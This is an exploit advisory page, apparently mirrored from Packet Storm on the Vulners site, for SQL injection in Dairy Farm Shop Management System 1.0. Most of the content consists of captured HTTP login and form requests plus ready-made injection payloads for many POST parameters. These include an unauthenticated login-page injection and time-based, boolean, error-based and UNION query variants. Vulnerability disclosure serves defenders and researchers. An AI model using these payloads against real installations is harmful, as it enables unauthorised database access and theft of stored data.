Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Dairy Farm Shop Management System 1.0 SQL Injection

🗓️ 07 Jan 2020 00:00:00Reported by Chris InzingaType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 206 Views

Dairy Farm Shop Management System 1.0 SQL Injection vulnerabilit

Code
`# Exploit Title: Dairy Farm Shop Management System 1.0 - 'username' SQL Injection  
# Google Dork: N/A  
# Date: 2020-01-03  
# Exploit Author: Chris Inzinga  
# Vendor Homepage: https://phpgurukul.com/  
# Software Link: https://phpgurukul.com/dairy-farm-shop-management-system-using-php-and-mysql/  
# Version: v1.0  
# Tested on: Windows  
# CVE: N/A  
  
# The Dairy Farm Shop Management System 1.0 web application is vulnerable to   
# SQL injection in multiple areas. The most severe of these is the username   
# parameter on the login page as this injection can be done unauthenticated.  
  
  
================================ 'username' - SQLi ================================  
  
POST /dfsms/index.php HTTP/1.1  
Host: 192.168.0.33  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://192.168.0.33/dfsms/index.php  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 34  
Connection: close  
Cookie: PHPSESSID=ogvk4oricas9oudnb7hb88kgjg  
Upgrade-Insecure-Requests: 1  
  
username=test&password=test&login=  
  
---  
Parameter: username (POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: username=test' AND (SELECT 5667 FROM (SELECT(SLEEP(5)))mKGL) AND 'UlkV'='UlkV&password=test&login=  
---  
[INFO] the back-end DBMS is MySQL  
back-end DBMS: MySQL >= 5.0.12  
  
  
  
================================ 'category' & 'categorycode' - SQLi ================================  
  
POST /dfsms/add-category.php HTTP/1.1  
Host: 192.168.0.33  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://192.168.0.33/dfsms/add-category.php  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 39  
Connection: close  
Cookie: PHPSESSID=ogvk4oricas9oudnb7hb88kgjg  
Upgrade-Insecure-Requests: 1  
  
category=test&categorycode=test&submit=  
  
---  
Parameter: category (POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: category=test' AND (SELECT 8892 FROM (SELECT(SLEEP(5)))WzFH) AND 'NELe'='NELe&categorycode=test&submit=  
---  
[INFO] the back-end DBMS is MySQL  
back-end DBMS: MySQL >= 5.0.12  
  
---  
Parameter: categorycode (POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: category=test&categorycode=test' AND (SELECT 9140 FROM (SELECT(SLEEP(5)))bzQA) AND 'izaK'='izaK&submit=  
---  
[INFO] the back-end DBMS is MySQL  
back-end DBMS: MySQL >= 5.0.12  
  
  
  
================================ 'companyname' - SQLi ================================  
  
---  
Parameter: companyname (POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: companyname=test' AND (SELECT 7565 FROM (SELECT(SLEEP(5)))znna) AND 'bEUm'='bEUm&submit=  
---  
[INFO] the back-end DBMS is MySQL  
back-end DBMS: MySQL >= 5.0.12  
  
  
  
================================ 'productname' & 'productprice' - SQLi ================================  
  
---  
Parameter: productname (POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: category=Milk&company=Amul&productname=test' AND (SELECT 1171 FROM (SELECT(SLEEP(5)))rlQI) AND 'RgaN'='RgaN&productprice=test&submit=  
---  
---  
Parameter: productprice (POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: category=Milk&company=Amul&productname=test&productprice=test' AND (SELECT 8940 FROM (SELECT(SLEEP(5)))BRuk) AND 'Imqh'='Imqh&submit=  
---  
[INFO] the back-end DBMS is MySQL  
back-end DBMS: MySQL >= 5.0.12  
  
  
  
================================ 'fromdate' & 'todate' - SQLi ================================  
  
---  
Parameter: todate (POST)  
Type: boolean-based blind  
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)  
Payload: fromdate=2020-01-05&todate=-6737' OR 3099=3099#&submit=  
  
Type: error-based  
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)  
Payload: fromdate=2020-01-05&todate=2020-01-31' OR (SELECT 3665 FROM(SELECT COUNT(*),CONCAT(0x7162766271,(SELECT (ELT(3665=3665,1))),0x716a7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- mqby&submit=  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: fromdate=2020-01-05&todate=2020-01-31' AND (SELECT 5717 FROM (SELECT(SLEEP(5)))adaE)-- cLAK&submit=  
  
Type: UNION query  
Title: MySQL UNION query (NULL) - 5 columns  
Payload: fromdate=2020-01-05&todate=2020-01-31' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162766271,0x666369456150614b454a4f51454e6e687449724a786445585455515a67614162754545716d476f6f,0x716a7a7171),NULL#&submit=  
  
Parameter: fromdate (POST)  
Type: error-based  
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)  
Payload: fromdate=2020-01-05' AND (SELECT 7128 FROM(SELECT COUNT(*),CONCAT(0x7162766271,(SELECT (ELT(7128=7128,1))),0x716a7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Tzxh&todate=2020-01-31&submit=  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: fromdate=2020-01-05' AND (SELECT 7446 FROM (SELECT(SLEEP(5)))Aklw)-- uzkF&todate=2020-01-31&submit=  
---  
  
  
  
================================ 'mobilenumber' & 'emailid' & 'adminname' - SQLi ================================  
  
---  
Parameter: emailid (POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: adminname=Admin&username=admin&[email protected]' AND (SELECT 5884 FROM (SELECT(SLEEP(5)))EgFJ) AND 'kFGt'='kFGt&mobilenumber=1234567899&update=  
---  
---  
Parameter: adminname (POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: adminname=Admin' AND (SELECT 5969 FROM (SELECT(SLEEP(5)))vpfG) AND 'kOJS'='kOJS&username=admin&[email protected]&mobilenumber=1234567899&update=  
---  
---  
Parameter: mobilenumber (POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: adminname=Admin&username=admin&[email protected]&mobilenumber=1234567899' AND (SELECT 1163 FROM (SELECT(SLEEP(5)))rdwj) AND 'mnwu'='mnwu&update=  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
07 Jan 2020 00:00Current
0.4Low risk
Vulners AI Score0.4
dairy farm shopmanagement systemsql injectionusernamelogincategorycategory codecompany nameproduct nameproduct pricemysql
206